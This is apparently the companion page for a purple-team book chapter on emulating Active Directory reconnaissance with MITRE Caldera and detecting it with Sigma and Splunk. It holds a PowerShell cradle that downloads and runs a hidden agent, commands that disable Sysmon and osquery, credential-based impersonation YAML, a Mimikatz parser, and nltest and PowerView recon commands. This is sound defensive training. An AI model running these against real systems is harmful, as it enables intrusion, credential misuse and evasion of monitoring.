Invisible link to canonical for Microformats

Active Directory Recon with MITRE Caldera

Introduction

In the second of the emulation chapters in the book, we explore the steps an adversary might take to enumerate the configuration of the environment, and high-value Active Directory users and hosts. In this chapter we use the second of our offensive tools, MITRE Caldera.


Chapter Content

This section provides reproductions of the key figures and code snippets seen in this chapter.

The Caldera Emulation Framework

Deploying Caldera

These commands stop and disable Sysmon and osquery on the Linux host to prevent unwanted telemetry being logged to Splunk.

ubuntu@ar-linux:~$ sudo systemctl stop sysmon
ubuntu@ar-linux:~$ sudo systemctl disable sysmon
ubuntu@ar-linux:~$ sudo systemctl stop osqueryd
ubuntu@ar-linux:~$ sudo systemctl disable osqueryd

Commands to clone the Caldera repository into /opt.

ubuntu@ar-linux:~$ cd /opt
ubuntu@ar-linux:/opt$ sudo git clone https://github.com/aguidetopurpleteaming/caldera.git --recursive

Commands to install Docker and build the Caldera container.

ubuntu@ar-linux:/opt$ cd /opt/caldera
ubuntu@ar-linux:/opt/caldera$ sudo apt update
ubuntu@ar-linux:/opt/caldera$ sudo apt install -y docker.io
ubuntu@ar-linux:/opt/caldera$ sudo docker build --build-arg WIN_BUILD=true . -t caldera:server

Command to launch the Caldera container and ‘detach’ to leave it running as a background process.

ubuntu@ar-linux:/opt/caldera$ sudo docker run -d --name=caldera -p 7010:7010 -p 7011:7011/udp -p 7012:7012 -p 8888:8888 caldera:server

Commands to spawn an interactive shell in the Caldera container and read the ‘red’ user default password.

ubuntu@ar-linux:/opt/caldera$ sudo docker exec -it caldera /bin/bash
root@e1a9473f9ca6:/usr/src/app# cat conf/local.yml

--snip--
users:
  blue:
    blue: z9yB8XthMOgaDiTChu7yXZ4sAdnJfJXwo9a_wo67hpY
  red:
    red: TxdlgzoC-0ZxnDTFYlUO_7UM3eEB1TecjYt3F43s2UY
Remotely Connecting to Endpoints

The PowerShell script used to connect hosts to the Caldera server by downloading and launching a Sandcat agent.

$server="http://10.0.1.21:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
get-process | ? {$_.modules.filename -like "C:\Users\Public\agpt.exe"} | stop-process -f;
rm -force "C:\Users\Public\agpt.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\agpt.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\agpt.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
Selecting Abilities

The YAML definition of the Identify active user ability:

---

- id: c0da588f-79f0-4263-8998-7496b1a40596
  name: Identify active user
  description: Find user running agent
  tactic: discovery
  technique:
    attack_id: T1033
    name: System Owner/User Discovery
  platforms:
    darwin:
      sh:
        command: whoami
        parsers:
          plugins.stockpile.app.parsers.basic:
            - source: host.user.name
            - source: domain.user.name
    linux:
      sh:
        command: whoami
        parsers:
          plugins.stockpile.app.parsers.basic:
            - source: host.user.name
            - source: domain.user.name
    windows:
      psh:
        command: |
          $env:username
        parsers:
          plugins.stockpile.app.parsers.basic:
            - source: host.user.name
            - source: domain.user.name
      cmd:
        command: echo %username%
        parsers:
          plugins.stockpile.app.parsers.basic:
            - source: host.user.name
            - source: domain.user.name
Working with Facts

A YAML definition for the ability to identify processes run by the users of a Linux host.

---

- id: 3b5db901-2cb8-4df7-8043-c4628a6a5d5a
  name: Find user processes
  description: Get process info for processes running as a user
  tactic: discovery
  technique:
    attack_id: T1057
    name: Process Discovery
  platforms:
    linux:
      sh:
        command: |
          ps aux | grep #{host.user.name}
    --snip--
  requirements:
    - plugins.stockpile.app.requirements.paw_provenance:
      - source: host.user.name

A snippet of the parser definitions for extracting users, passwords and NTHashes for users from Mimikatz output.

parsers:
  plugins.stockpile.app.parsers.katz:
  - source: domain.user.name
    edge: has_password
    target: domain.user.password
  - source: domain.user.name
    edge: has_hash
    target: domain.user.ntlm
  - source: domain.user.name
    edge: has_hash
    target: domain.user.sha1

An Impersonate User ability that leverages the paw_provenance plugin to match user credential facts to the current host.

---

- id: 3796a00b-b11d-4731-b4ca-275a07d83299
  name: Impersonate user
  description: Run an application as a different user
  tactic: execution
  technique:
    attack_id: T1059.001
    name: "Command and Scripting Interpreter: PowerShell"
  platforms:
    windows:
      psh:
        command: |
          $job = Start-Job -ScriptBlock {
            $username = '#{host.user.name}';
            $password = '#{host.user.password}';
            $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
            $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
            Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;
          };
          Receive-Job -Job $job -Wait;
  requirements:
    - plugins.stockpile.app.requirements.paw_provenance:
      - source: host.user.name
    - plugins.stockpile.app.requirements.basic:
      - source: host.user.name
        edge: has_password
        target: host.user.password

Logging

You can download calderaToAttire from: https://github.com/improsec/calderaToAttire

Command to convert an exported Caldera report output to ATTiRe format using calderaToAttire.

ubuntu@agpt:/Tools/calderaToAttire$ python CalderaToAttire.py Enumerator_report.json

Simulating Active Directory Enumeration

Commands used in the creation of abilities for Active Directory reconnaissance.

nltest /domain_trusts /all_trusts
nltest /dclist:%USERDOMAIN%
net group "Domain Admins" /domain

Additional commands leveraging PowerShell and the PowerView script.

Import-Module .\PowerView.ps1 -Force; 
Get-DomainComputer -OperatingSystem *server* -Properties dnshostname

Import-Module .\PowerView.ps1 -Force; 
Get-DomainUser -SPN 

Defending Against the Attack

Command Line Arguments

A sigma rule for detection of nltest usage.

Sourced from: https://github.com/SigmaHQ/sigma/blob/fad4742996c55d8d4663e611f84877a2b741dc46/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml
title: Potential Recon Activity Via Nltest.EXE
id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248
related:
    - id: 410ad193-a728-4107-bc79-4419789fcbf8
      type: similar
    - id: 903076ff-f442-475a-b667-4f246bcc203b
      type: similar
    - id: 77815820-246c-47b8-9741-e0def3f57308
      type: obsolete
status: test
description: Detects nltest commands that can be used for information discovery
references:
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)
    - https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/
    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
    - https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters
    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
    - https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html
    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
    - https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest
author: Craig Young, oscd.community, Georg Lauenstein
date: 2021-07-24
modified: 2023-12-15
tags:
    - attack.discovery
    - attack.t1016
    - attack.t1482
logsource:
    category: process_creation
    product: windows
detection:
    selection_nltest:
        - Image|endswith: '\nltest.exe'
        - OriginalFileName: 'nltestrk.exe'
    selection_recon:
        - CommandLine|contains|all:
              - 'server'
              - 'query'
        - CommandLine|contains:
              - '/user'
              - 'all_trusts' # Flag for /domain_trusts
              - 'dclist:'
              - 'dnsgetdc:'
              - 'domain_trusts'
              - 'dsgetdc:'
              - 'parentdomain'
              - 'trusted_domains'
    condition: all of selection_*
falsepositives:
    - Legitimate administration use but user and host must be investigated
level: medium

A Splunk SPL query produced from the above Sigma rule, transformed using pySigma.

EventID=1 
Image="*\\nltest.exe" OR OriginalFileName="nltestrk.exe"
(CommandLine="*server*" CommandLine="*query*") OR CommandLine IN ("*/user*", "*all_trusts*", "*dclist:*", "*dnsgetdc:*", "*domain_trusts*", "*dsgetdc:*", "*parentdomain*", "*trusted_domains*")

An equivalent query using process creation events with event ID 4688.

EventID=4688
NewProcessName=*\\nltest.exe
(CommandLine="*server*" CommandLine="*query*") OR CommandLine IN ("*/user*", "*all_trusts*", "*dclist:*", "*dnsgetdc:*", "*domain_trusts*", "*dsgetdc:*", "*parentdomain*", "*trusted_domains*")
Theshold-Based Alerting

A threshold-based Splunk SPL query, looking for more than two enumeration commands performed on the same host in the lookback window.

index=win
Channel="Microsoft-Windows-Sysmon/Operational"
EventID=1
(Image="*\\nltest.exe" AND CommandLine IN ("*/dclist*", "*/domain_trusts*")) OR (Image="*\\net*.exe" AND CommandLine="*Domain Admins*")
| stats dc(CommandLine) as distinct_commands by Computer
| where distinct_commands > 2
Suspicious LDAP Queries
Configuring SilkService

The SilkService XML configuration, set to fetch LDAP queries from the Microsoft-Windows-LDAP-Client provider.

<SilkServiceConfig>
  <ETWCollector>
    <Guid>6a1e76fd-792b-412f-91ea-4b365de07bae</Guid>
    <CollectorType>user</CollectorType>
    <ProviderName>Microsoft-Windows-LDAP-Client</ProviderName>
    <OutputType>eventlog</OutputType>
  </ETWCollector>
</SilkServiceConfig>

Commands to create and start the SilkService service.

C:\Program Files\SilkService> sc create SilkService binPath= "C:\Program Files\SilkService\SilkService.exe" start= auto
C:\Program Files\SilkService> sc start SilkService

The command to open the LDAP query window using dsquery,

C:\Users\Administrator> rundll32 dsquery,OpenQueryWindow

An LDAP query to execute in the query window.

(samAccountName=Administrator)
Forwaring SilkService Events

The configuration for Splunk event forwarding created at C:\Program Files\SplunkUniversalForwarder\etc\apps\silkservice_inputs_app\local\inputs.conf.

[WinEventLog://SilkService-Log]
disabled = false
renderXml = false
index = etw
source = XmlWinEventLog:SilkService-Log

Commands to restart the SplunkForwarder service to load the above configuration.

C:\Users\Administrator> sc stop SplunkForwarder
C:\Users\Administrator> sc start SplunkForwarder

A Splunk query to transform the SilkService logs and filter for the Microsoft-Windows-LDAP-Client.

index=etw 
| spath input=Message 
| rename XmlEventData.* as *
| search ProviderName="Microsoft-Windows-LDAP-Client"
Identifying Tool-Specific Queries

Splunk SPL query to identify usage of PowerView to find kerberoastable users via a specific LDAP search filter.

index=etw 
| spath input=Message 
| rename XmlEventData.* as *
| search ProviderName="Microsoft-Windows-LDAP-Client"
| search SearchFilter="(&(samAccountType=805306368)(servicePrincipalName=\*))"

A similar query for identifying discovery of Active Directory computers, again using PowerView.

index=etw 
| spath input=Message 
| rename XmlEventData.* as *
| search ProviderName="Microsoft-Windows-LDAP-Client"
| search SearchFilter= "(&(samAccountType=805306369)(operatingsystem=*server*))"

Resources

The following resources expand on topics covered in this chapter.

The Scenario

The translated Conti playbook showing Active Directory reconnaissance using LOLBAS and PowerView

"Conti-Leaked-Playbook-TTPs," accessed May 27, 2024

Read More

Selecting Abilities

The YAML definition for the Identify active user ability provided by the Stockpile plugin

"c0da588f-79f0-4263-8998-7496b1a40596," accessed May 27, 2024

Read More
Caldera has a feature-rich API that can be leveraged to automate the creation of abilities, adversaries and operations. This is an example of this end-to-end process

"pyCaldera," accessed November 3, 2024

Read More
The Compass plugin for Caldera provides a built-in ATT&CK Navigator and enables adversary profiles to be converted into Navigator layers and, going the other way, enables Navigator layers to be converted into adversary profiles (where the abilities exist)

"Compass," GitHub, accessed November 2, 2024

Read More

Working with Facts

Fact parsers provided by the Stockpile plugin, including one for Mimikatz output

"parsers," accessed May 27, 2024

Read More
The YAML definition for the Impersonate user ability that makes use of relationships between facts to operationalize username and password combinations

"3796a00b-b11d-4731-b4ca-275a07d83299," accessed May 27, 2024

Read More

Obfuscating Execution

Base64 obfuscator provided by the Stockpile plugin, used to modify executed abilities

"base64_basic.py," accessed May 27, 2024

Read More

Command Line Arguments

A Sigma rule for detecting Active Directory reconnaissance using nltest

"process_creation/proc_creation_win_nltest_recon.yml," GitHub, accessed November 3, 2024

Read More

Suspicious LDAP Queries

A section of the PowerView script that constructs the LDAP search filter for kerberoastable users

"PowerView.ps1," accessed November 3, 2024

Read More
A walkthrough by Riccardo Ancarani on use of SilkETW to detect suspicious LDAP queries with ETW telemetry

Riccardo Ancarani, "Hunting for Suspicious LDAP Activity with SilkETW and Yara," October 19, 2019

Read More
A snippet from the Rubeus code base that includes the construction of an LDAP search filter for the purposes of identifying kerberoastable users

"Roast.cs," accessed May 27, 2024

Read More
A snippet from the GetUserSPNs.py script that includes a similar code section for constructing an LDAP search for kerberoastable users

"GetUsersSPNs.py," accessed May 27, 2024

Read More
A blog from Dom Chell on the red team perspective to Active Directory enumeration, including alternative sources of LDAP telemetry, defensive use cases and subsequent evasions

Dom Chell, "Active Directory Enumeration for Red Teams," MDSec, Feb, 2024

Read More